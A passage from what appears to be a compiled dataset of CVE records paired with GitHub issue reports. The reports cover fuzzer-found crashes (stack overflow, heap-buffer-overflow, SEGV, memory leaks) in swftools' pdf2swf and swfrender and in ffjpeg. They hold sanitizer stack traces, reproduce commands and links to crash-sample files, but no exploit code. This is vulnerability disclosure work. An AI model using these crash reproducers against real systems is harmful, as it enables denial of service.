/home/bupt/Desktop/swftools/lib/pdf/xpdf/Parser.cc:64:21 #206 0x65c9cd in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Parser.cc:85:20 #207 0x65375a in XRef::fetch(int, int, Object*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/XRef.cc:823:13 #208 0x6501de in Object::fetch(XRef*, Object*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Object.cc:106:16 #209 0x65b0a4 in Dict::lookup(char*, Object*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Dict.cc:76:35 #210 0x65f092 in Object::dictLookup(char*, Object*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Object.h:253:18 #211 0x65f092 in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Parser.cc:156:9 #212 0x65d23e in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Parser.cc:94:18 #213 0x65bdd6 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Parser.cc:64:21 #214 0x65c9cd in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Parser.cc:85:20 #215 0x65375a in XRef::fetch(int, int, Object*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/XRef.cc:823:13 #216 0x6501de in Object::fetch(XRef*, Object*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Object.cc:106:16 #217 0x65b0a4 in Dict::lookup(char*, Object*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Dict.cc:76:35 #218 0x65f092 in Object::dictLookup(char*, Object*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Object.h:253:18 #219 0x65f092 in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Parser.cc:156:9 #220 0x65d23e in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Parser.cc:94:18 #221 0x65bdd6 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Parser.cc:64:21 #222 0x65c9cd in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Parser.cc:85:20 #223 0x65375a in XRef::fetch(int, int, Object*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/XRef.cc:823:13 #224 0x6501de in Object::fetch(XRef*, Object*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Object.cc:106:16 #225 0x65b0a4 in Dict::lookup(char*, Object*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Dict.cc:76:35 #226 0x65f092 in Object::dictLookup(char*, Object*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Object.h:253:18 #227 0x65f092 in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Parser.cc:156:9 #228 0x65d23e in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Parser.cc:94:18 #229 0x65bdd6 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Parser.cc:64:21 #230 0x65c9cd in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Parser.cc:85:20 #231 0x65375a in XRef::fetch(int, int, Object*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/XRef.cc:823:13 #232 0x6501de in Object::fetch(XRef*, Object*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Object.cc:106:16 #233 0x65b0a4 in Dict::lookup(char*, Object*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Dict.cc:76:35 #234 0x65f092 in Object::dictLookup(char*, Object*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Object.h:253:18 #235 0x65f092 in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Parser.cc:156:9 #236 0x65d23e in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Parser.cc:94:18 #237 0x65bdd6 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Parser.cc:64:21 #238 0x65c9cd in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Parser.cc:85:20 #239 0x65375a in XRef::fetch(int, int, Object*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/XRef.cc:823:13 #240 0x6501de in Object::fetch(XRef*, Object*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Object.cc:106:16 #241 0x65b0a4 in Dict::lookup(char*, Object*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Dict.cc:76:35 #242 0x65f092 in Object::dictLookup(char*, Object*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Object.h:253:18 #243 0x65f092 in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Parser.cc:156:9 #244 0x65d23e in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Parser.cc:94:18 #245 0x65bdd6 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Parser.cc:64:21 #246 0x65c9cd in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Parser.cc:85:20 #247 0x65375a in XRef::fetch(int, int, Object*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/XRef.cc:823:13 #248 0x6501de in Object::fetch(XRef*, Object*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Object.cc:106:16 #249 0x65b0a4 in Dict::lookup(char*, Object*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Dict.cc:76:35 #250 0x65f092 in Object::dictLookup(char*, Object*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Object.h:253:18 #251 0x65f092 in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Parser.cc:156:9 #252 0x65d23e in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Parser.cc:94:18 #253 0x65bdd6 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Parser.cc:64:21 #254 0x65c9cd in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Parser.cc:85:20 #255 0x65375a in XRef::fetch(int, int, Object*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/XRef.cc:823:13 #256 0x6501de in Object::fetch(XRef*, Object*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Object.cc:106:16 #257 0x65b0a4 in Dict::lookup(char*, Object*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Dict.cc:76:35 #258 0x65f092 in Object::dictLookup(char*, Object*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Object.h:253:18 #259 0x65f092 in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Parser.cc:156:9 #260 0x65d23e in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Parser.cc:94:18 #261 0x65bdd6 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Parser.cc:64:21 #262 0x65c9cd in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Parser.cc:85:20 #263 0x65375a in XRef::fetch(int, int, Object*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/XRef.cc:823:13 #264 0x6501de in Object::fetch(XRef*, Object*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Object.cc:106:16 #265 0x65b0a4 in Dict::lookup(char*, Object*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Dict.cc:76:35 #266 0x65f092 in Object::dictLookup(char*, Object*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Object.h:253:18 #267 0x65f092 in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Parser.cc:156:9 #268 0x65d23e in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Parser.cc:94:18 #269 0x65bdd6 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Parser.cc:64:21 #270 0x65c9cd in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Parser.cc:85:20 #271 0x65375a in XRef::fetch(int, int, Object*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/XRef.cc:823:13 #272 0x6501de in Object::fetch(XRef*, Object*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Object.cc:106:16 #273 0x65b0a4 in Dict::lookup(char*, Object*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Dict.cc:76:35 #274 0x65f092 in Object::dictLookup(char*, Object*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Object.h:253:18 #275 0x65f092 in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Parser.cc:156:9 #276 0x65d23e in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Parser.cc:94:18 #277 0x65bdd6 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Parser.cc:64:21 #278 0x65c9cd in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Parser.cc:85:20 #279 0x65375a in XRef::fetch(int, int, Object*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/XRef.cc:823:13 #280 0x6501de in Object::fetch(XRef*, Object*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Object.cc:106:16 #281 0x65b0a4 in Dict::lookup(char*, Object*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Dict.cc:76:35 #282 0x65f092 in Object::dictLookup(char*, Object*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Object.h:253:18 #283 0x65f092 in Parser::makeStream(Object*, unsigned char*, CryptAlgorithm, int, int, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Parser.cc:156:9 #284 0x65d23e in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Parser.cc:94:18 SUMMARY: AddressSanitizer: stack-overflow /build/glibc-CVJwZb/glibc-2.27/stdio-common/vfprintf.c:1275 in vfprintf ==27980==ABORTING ``` ### reproduce command to reproduce: ./pdf2swf -G -f -t [sample file] -o /dev/null ### sample file [id479_stack_overflow___asanAllocatorAllocate.zip](https://github.com/matthiaskramm/swftools/files/9036150/id479_stack_overflow___asanAllocatorAllocate.zip) ### crash info ``` ==29770==ERROR: AddressSanitizer: stack-overflow on address 0x7ffccd202fe8 (pc 0x0000004e43a9 bp 0x7fb33d9f7000 sp 0x7ffccd202fc0 T0) #0 0x4e43a9 in __sanitizer::StackDepotNode::hash(__sanitizer::StackTrace const&) /home/bupt/Desktop/tools/llvm-12.0.1/llvm/projects/compiler-rt/lib/sanitizer_common/sanitizer_stackdepot.cpp:54 #1 0x4e43a9 in __sanitizer::StackDepotBase<__sanitizer::StackDepotNode, 1, 20>::Put(__sanitizer::StackTrace, bool*) /home/bupt/Desktop/tools/llvm-12.0.1/llvm/projects/compiler-rt/lib/sanitizer_common/sanitizer_stackdepotbase.h:104 #2 0x4e43a9 in __sanitizer::StackDepotPut(__sanitizer::StackTrace) /home/bupt/Desktop/tools/llvm-12.0.1/llvm/projects/compiler-rt/lib/sanitizer_common/sanitizer_stackdepot.cpp:98 #3 0x42b232 in __asan::Allocator::QuarantineChunk(__asan::AsanChunk*, void*, __sanitizer::BufferedStackTrace*) /home/bupt/Desktop/tools/llvm-12.0.1/llvm/projects/compiler-rt/lib/asan/asan_allocator.cpp:640 #4 0x42b232 in __asan::Allocator::Deallocate(void*, unsigned long, unsigned long, __sanitizer::BufferedStackTrace*, __asan::AllocType) /home/bupt/Desktop/tools/llvm-12.0.1/llvm/projects/compiler-rt/lib/asan/asan_allocator.cpp:714 #5 0x42b232 in __asan::asan_free(void*, __sanitizer::BufferedStackTrace*, __asan::AllocType) /home/bupt/Desktop/tools/llvm-12.0.1/llvm/projects/compiler-rt/lib/asan/asan_allocator.cpp:971 #6 0x4b2e60 in free /home/bupt/Desktop/tools/llvm-12.0.1/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cpp:128 #7 0x607d1b in gfree /home/bupt/Desktop/swftools/lib/pdf/xpdf/gmem.cc:275:5 #8 0x65039b in Object::free() /home/bupt/Desktop/swftools/lib/pdf/xpdf/Object.cc #9 0x65bbdc in Parser::shift() /home/bupt/Desktop/swftools/lib/pdf/xpdf/Parser.cc:221:8 #10 0x65bbdc in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Parser.cc:61:5 #11 0x65bdd6 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Parser.cc:64:21 //........ #254 0x65bdd6 in Parser::getObj(Object*, unsigned char*, CryptAlgorithm, int, int, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Parser.cc:64:21 SUMMARY: AddressSanitizer: stack-overflow /home/bupt/Desktop/tools/llvm-12.0.1/llvm/projects/compiler-rt/lib/sanitizer_common/sanitizer_stackdepot.cpp:54 in __sanitizer::StackDepotNode::hash(__sanitizer::StackTrace const&) ==29770==ABORTING ``` --------------------------- # memory leak ### reproduce command to reproduce: ./pdf2swf -G -f -t [sample file] -o /dev/null ### sample file [id472_memory_leak.zip](https://github.com/matthiaskramm/swftools/files/9036159/id472_memory_leak.zip) ### crash info ``` =28310==ERROR: LeakSanitizer: detected memory leaks Indirect leak of 96 byte(s) in 2 object(s) allocated from: #0 0x4b3160 in malloc /home/bupt/Desktop/tools/llvm-12.0.1/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cpp:145 #1 0x96870e in rfx_alloc /home/bupt/Desktop/swftools/lib/mem.c:30:9 #2 0x7efc80cddc86 in __libc_start_main /build/glibc-CVJwZb/glibc-2.27/csu/../csu/libc-start.c:310 SUMMARY: AddressSanitizer: 96 byte(s) leaked in 2 allocation(s). ``` ------------------------ # SEGV ### reproduce command to reproduce: ./pdf2swf -G -f -t [sample file] -o /dev/null ### sample file [id382_SEGV_getchar.zip](https://github.com/matthiaskramm/swftools/files/9036166/id382_SEGV_getchar.zip) ### crash info ``` ==3792==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x000000632fbf bp 0x000000000000 sp 0x7fffb1af4390 T0) ==3792==The signal is caused by a READ memory access. ==3792==Hint: address points to the zero page. #0 0x632fbf in DCTStream::getChar() /home/bupt/Desktop/swftools/lib/pdf/xpdf/Stream.cc:2048:9 #1 0x60e023 in ImageStream::getLine() /home/bupt/Desktop/swftools/lib/pdf/xpdf/Stream.cc:373:25 #2 0x60dd51 in ImageStream::getPixel(unsigned char*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Stream.cc:344:5 #3 0x7c9dc5 in VectorGraphicOutputDev::drawGeneralImage(GfxState*, Object*, Stream*, int, int, GfxImageColorMap*, int, int, int, int*, Stream*, int, int, int, GfxImageColorMap*) /home/bupt/Desktop/swftools/lib/pdf/VectorGraphicOutputDev.cc:1303:12 #4 0x7ccc45 in VectorGraphicOutputDev::drawImage(GfxState*, Object*, Stream*, int, int, GfxImageColorMap*, int*, int) /home/bupt/Desktop/swftools/lib/pdf/VectorGraphicOutputDev.cc:1430:5 #5 0x71dc57 in Gfx::doImage(Object*, Stream*, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Gfx.cc:3664:12 #6 0x6ec5e0 in Gfx::opXObject(Object*, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Gfx.cc:3336:7 #7 0x705f02 in Gfx::execOp(Object*, Object*, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Gfx.cc:693:3 #8 0x7049c1 in Gfx::go(int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Gfx.cc:584:7 #9 0x703ea8 in Gfx::display(Object*, int) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Gfx.cc:556:3 #10 0x6b9401 in Page::displaySlice(OutputDev*, double, double, int, int, int, int, int, int, int, int, Catalog*, int (*)(void*), void*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Page.cc:317:10 #11 0x6b8cee in Page::display(OutputDev*, double, double, int, int, int, int, Catalog*, int (*)(void*), void*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/Page.cc:264:3 #12 0x6099b0 in PDFDoc::displayPage(OutputDev*, int, double, double, int, int, int, int, int (*)(void*), void*) /home/bupt/Desktop/swftools/lib/pdf/xpdf/PDFDoc.cc:317:27 #13 0x5f87d5 in render2(_gfxpage*, _gfxdevice*, int, int, int, int, int, int) /home/bupt/Desktop/swftools/lib/pdf/pdf.cc:164:14 #14 0x5f8e64 in pdfpage_rendersection(_gfxpage*, _gfxdevice*, double, double, double, double, double, double) /home/bupt/Desktop/swftools/lib/pdf/pdf.cc:190:5 #15 0x501816 in main /home/bupt/Desktop/swftools/src/pdf2swf.c:832:3 #16 0x7f66704d8c86 in __libc_start_main /build/glibc-CVJwZb/glibc-2.27/csu/../csu/libc-start.c:310 #17 0x420b99 in _start (/home/bupt/Desktop/swftools/build/bin/pdf2swf+0x420b99) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV /home/bupt/Desktop/swftools/lib/pdf/xpdf/Stream.cc:2048:9 in DCTStream::getChar() ==3792==ABORTING ```
bug report swftools-pdf2swf
https://api.github.com/repos/swftools/swftools/issues/184/comments
0
2022-07-04T03:13:51Z
2022-07-04T03:20:37Z
https://github.com/swftools/swftools/issues/184
1,292,557,716
184
CVE-2022-35113
2022-08-16T21:15:11.363
SWFTools commit 772e55a2 was discovered to contain a heap-buffer overflow via swf_DefineLosslessBitsTagToImage at /modules/swfbits.c.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "[email protected]", "type": "Primary" } ] }
[ { "source": "[email protected]", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/matthiaskramm/swftools/issues/185" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:swftools:swftools:-:*:*:*:*:*:*:*", "matchCriteriaId": "05E27E60-6223-457B-BF90-E747C9C5DEE1", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/matthiaskramm/swftools/issues/185
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "matthiaskramm", "swftools" ]
# swfrender ## heap buffer overflow ### command to reproduce `./swfrender [sample file] -o /dev/null` ### crash sample [id8_heap-buffer-overflow_swf_DefineLosslessBitsTagToImage.zip](https://github.com/matthiaskramm/swftools/files/9036326/id8_heap-buffer-overflow_swf_DefineLosslessBitsTagToImage.zip) ### crash info ``` ==20010==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x6110000007fc at pc 0x000000509052 bp 0x7ffd07ab6370 sp 0x7ffd07ab6368 READ of size 4 at 0x6110000007fc thread T0 #0 0x509051 in swf_DefineLosslessBitsTagToImage /home/bupt/Desktop/swftools/lib/modules/swfbits.c:1037:16 #1 0x50aacb in swf_ExtractImage /home/bupt/Desktop/swftools/lib/modules/swfbits.c:1221:9 #2 0x4fcf44 in extractDefinitions /home/bupt/Desktop/swftools/lib/readers/swf.c:405:18 #3 0x4fcf44 in swf_open /home/bupt/Desktop/swftools/lib/readers/swf.c:736:18 #4 0x4f6846 in main /home/bupt/Desktop/swftools/src/swfrender.c:174:29 #5 0x7fb150d57c86 in __libc_start_main /build/glibc-CVJwZb/glibc-2.27/csu/../csu/libc-start.c:310 #6 0x41d4c9 in _start (/home/bupt/Desktop/swftools/build/bin/swfrender+0x41d4c9) 0x6110000007fc is located 764 bytes to the right of 256-byte region [0x611000000400,0x611000000500) allocated by thread T0 here: #0 0x4afa90 in malloc /home/bupt/桌面/tools/llvm-12.0.1/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cpp:145 #1 0x62146e in rfx_alloc /home/bupt/Desktop/swftools/lib/mem.c:30:9 #2 0x50aacb in swf_ExtractImage /home/bupt/Desktop/swftools/lib/modules/swfbits.c:1221:9 #3 0x4f6846 in main /home/bupt/Desktop/swftools/src/swfrender.c:174:29 #4 0x7fb150d57c86 in __libc_start_main /build/glibc-CVJwZb/glibc-2.27/csu/../csu/libc-start.c:310 SUMMARY: AddressSanitizer: heap-buffer-overflow /home/bupt/Desktop/swftools/lib/modules/swfbits.c:1037:16 in swf_DefineLosslessBitsTagToImage Shadow bytes around the buggy address: 0x0c227fff80a0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c227fff80b0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c227fff80c0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c227fff80d0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c227fff80e0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa =>0x0c227fff80f0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa[fa] 0x0c227fff8100: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c227fff8110: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c227fff8120: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c227fff8130: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c227fff8140: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb Shadow gap: cc ==20010==ABORTING ``` ----------------------- ## SEGV ### command to reproduce `./swfrender [sample file] -o /dev/null` ### crash sample [id58_SEGV_extractFrame.zip](https://github.com/matthiaskramm/swftools/files/9036327/id58_SEGV_extractFrame.zip) ### crash info ``` ==20817==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000004 (pc 0x0000004f9f76 bp 0x0c1600000664 sp 0x7fffe97402a0 T0) ==20817==The signal is caused by a READ memory access. ==20817==Hint: address points to the zero page. #0 0x4f9f76 in extractFrame /home/bupt/Desktop/swftools/lib/readers/swf.c:458:49 #1 0x4f981c in swfpage_render /home/bupt/Desktop/swftools/lib/readers/swf.c:637:23 #2 0x4f7398 in main /home/bupt/Desktop/swftools/src/swfrender.c:218:17 #3 0x7f720636dc86 in __libc_start_main /build/glibc-CVJwZb/glibc-2.27/csu/../csu/libc-start.c:310 #4 0x41d4c9 in _start (/home/bupt/Desktop/swftools/build/bin/swfrender+0x41d4c9) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV /home/bupt/Desktop/swftools/lib/readers/swf.c:458:49 in extractFrame ==20817==ABORTING ```
bug found in swfrender
https://api.github.com/repos/swftools/swftools/issues/185/comments
0
2022-07-04T04:15:24Z
2022-07-04T04:15:24Z
https://github.com/swftools/swftools/issues/185
1,292,592,670
185
CVE-2022-35433
2022-08-16T21:15:11.440
ffjpeg commit caade60a69633d74100bd3c2528bddee0b6a1291 was discovered to contain a memory leak via /src/jfif.c.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 6.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 3.6, "source": "[email protected]", "type": "Primary" } ] }
[ { "source": "[email protected]", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/rockcarry/ffjpeg/issues/52" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:ffjpeg_project:ffjpeg:*:*:*:*:*:*:*:*", "matchCriteriaId": "A1391A61-FDE9-48B2-A3F5-5A162BA44F82", "versionEndExcluding": "2021-12-16", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/rockcarry/ffjpeg/issues/52
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "rockcarry", "ffjpeg" ]
### sample file [id8_memory_leak.zip](https://github.com/rockcarry/ffjpeg/files/9053199/id8_memory_leak.zip) ### command to reproduce `./ffjpeg -d [sample file]` ### execute info ``` usrc overflow ================================================================= ==16225==ERROR: LeakSanitizer: detected memory leaks Direct leak of 256 byte(s) in 1 object(s) allocated from: #0 0x4ae760 in malloc /home/bupt/Desktop/tools/llvm-12.0.1/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cpp:145 #1 0x4f8ddf in jfif_decode /home/bupt/Desktop/ffjpeg/src/jfif.c:404:23 #2 0x4f4495 in main /home/bupt/Desktop/ffjpeg/src/ffjpeg.c:24:9 #3 0x7f9807bedc86 in __libc_start_main /build/glibc-CVJwZb/glibc-2.27/csu/../csu/libc-start.c:310 Direct leak of 256 byte(s) in 1 object(s) allocated from: #0 0x4ae760 in malloc /home/bupt/Desktop/tools/llvm-12.0.1/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cpp:145 #1 0x4f8cfe in jfif_decode /home/bupt/Desktop/ffjpeg/src/jfif.c:404:23 #2 0x4f4495 in main /home/bupt/Desktop/ffjpeg/src/ffjpeg.c:24:9 #3 0x7f9807bedc86 in __libc_start_main /build/glibc-CVJwZb/glibc-2.27/csu/../csu/libc-start.c:310 Direct leak of 1 byte(s) in 1 object(s) allocated from: #0 0x4ae760 in malloc /home/bupt/Desktop/tools/llvm-12.0.1/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cpp:145 #1 0x4f9ea7 in jfif_decode /home/bupt/Desktop/ffjpeg/src/jfif.c:445:21 #2 0x4f4495 in main /home/bupt/Desktop/ffjpeg/src/ffjpeg.c:24:9 #3 0x7f9807bedc86 in __libc_start_main /build/glibc-CVJwZb/glibc-2.27/csu/../csu/libc-start.c:310 Direct leak of 1 byte(s) in 1 object(s) allocated from: #0 0x4ae760 in malloc /home/bupt/Desktop/tools/llvm-12.0.1/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cpp:145 #1 0x4f9e6b in jfif_decode /home/bupt/Desktop/ffjpeg/src/jfif.c:444:21 #2 0x4f4495 in main /home/bupt/Desktop/ffjpeg/src/ffjpeg.c:24:9 #3 0x7f9807bedc86 in __libc_start_main /build/glibc-CVJwZb/glibc-2.27/csu/../csu/libc-start.c:310 Direct leak of 1 byte(s) in 1 object(s) allocated from: #0 0x4ae760 in malloc /home/bupt/Desktop/tools/llvm-12.0.1/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cpp:145 #1 0x4f9e25 in jfif_decode /home/bupt/Desktop/ffjpeg/src/jfif.c:443:21 #2 0x4f4495 in main /home/bupt/Desktop/ffjpeg/src/ffjpeg.c:24:9 #3 0x7f9807bedc86 in __libc_start_main /build/glibc-CVJwZb/glibc-2.27/csu/../csu/libc-start.c:310 